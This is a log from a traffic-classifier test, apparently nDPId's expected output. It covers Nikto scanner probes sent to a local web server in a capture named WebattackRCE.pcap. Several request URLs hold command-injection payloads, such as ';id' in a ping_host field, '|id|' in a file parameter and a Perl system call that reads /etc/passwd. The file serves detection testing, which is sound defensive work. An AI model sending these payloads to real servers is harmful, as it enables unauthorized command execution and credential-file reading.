+01074{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ews\/ews\/architext_query.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001073)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1576420277543,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277543,"pkt":"AAAAAAAAAAAAAAAACABFAADI031AAEAGaLB\/AAABfwAAAcXQH5AqpOuTqUte6oAYAED+vAAAAQEICp1m\/k+dZv5OR0VUIC9leGVjL3Nob3cvY29uZmlnL2NyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDc0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/exec\/show\/config\/cr","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001074)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1576420277544,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277544,"pkt":"AAAAAAAAAAAAAAAACABFAADPHndAAEAGHbB\/AAABfwAAAcXSH5BxSyag9dSEBYAYAED+wwAAAQEICp1m\/lCdZv5QR0VUIC9pbnN0YW50d2VibWFpbC9tZXNzYWdlLnBocCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA3NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/instantwebmail\/message.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001075)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1576420277546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277546,"pkt":"AAAAAAAAAAAAAAAACABFAADZI0FAAEAGGNx\/AAABfwAAAcXUH5D0qBvWdLImZ4AYAED+zQAAAQEICp1m\/lGdZv5RR0VUIC9jZmRvY3Mvc25pcHBldHMvZ2V0dGVtcGRpcmVjdG9yeS5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/snippets\/gettempdirectory.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001076)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1576420277547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277547,"pkt":"AAAAAAAAAAAAAAAACABFAADT6e9AAEAGUjN\/AAABfwAAAcXWH5DaBdEHtMEbgIAYAED+xwAAAQEICp1m\/lOdZv5TR0VUIC9kb3N0dWZmLnBocD9hY3Rpb249bW9kaWZ5X3VzZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/dostuff.php?action=modify_user","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001091)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1576420277549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277549,"pkt":"AAAAAAAAAAAAAAAACABFAADIKVFAAEAGEt1\/AAABfwAAAcXYH5AE3RGlWDKVx4AYAED+vAAAAQEICp1m\/lWdZv5VR0VUIC9sb2dqYW0vc2hvd2hpdHMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTU3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/logjam\/showhits.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001157)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1576420277550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277550,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/wwtAAEAGeSt\/AAABfwAAAcXaH5CLi\/vjqeJa6IAYAED+swAAAQEICp1m\/ladZv5WR0VUIC9tYW51YWwucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/manual.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001158)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1576420277552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277552,"pkt":"AAAAAAAAAAAAAAAACABFAADZ8pVAAEAGSYd\/AAABfwAAAcXcH5AUWcqAeMmTFYAYAED+zQAAAQEICp1m\/lidZv5YR0VUIC9tb2RzL2FwYWdlL2FwYWdlLmNnaT9mPWZpbGUuaHRtLnxpZHwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mods\/apage\/apage.cgi?f=file.htm.|id|","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001159)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7560000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1576420277553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1576420277553,"pkt":"AAAAAAAAAAAAAAAACABFAAD6YiVAAEAG2dZ\/AAABfwAAAcXeH5DIEFrQ9+zWrIAYAED+7gAAAQEICp1m\/lmdZv5ZR0VUIC9tb2R1bGVzLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7560000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001160)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7560000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1576420277554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":269,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":269,"pkt_l4_len":235,"thread_ts_msec":1576420277554,"pkt":"AAAAAAAAAAAAAAAACABFAAD\/xMZAAEAGdzB\/AAABfwAAAcXgH5A8ZfwprHRx4oAYAED+8wAAAQEICp1m\/lqdZv5aR0VUIC9udWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTYxKQ0KDQo="} +01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7560000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001161)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1576420277556,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420277556,"pkt":"AAAAAAAAAAAAAAAACABFAADi3pNAAEAGXYB\/AAABfwAAAcXiH5AliOZ9pOzTK4AYAED+1gAAAQEICp1m\/lydZv5cR0VUIC9wZXJsLy1lJTIwJTIyc3lzdGVtKCdjYXQlMjAvZXRjL3Bhc3N3ZCcpO1wlMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20%22system('cat%20\/etc\/passwd');\\%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001162)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7560000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
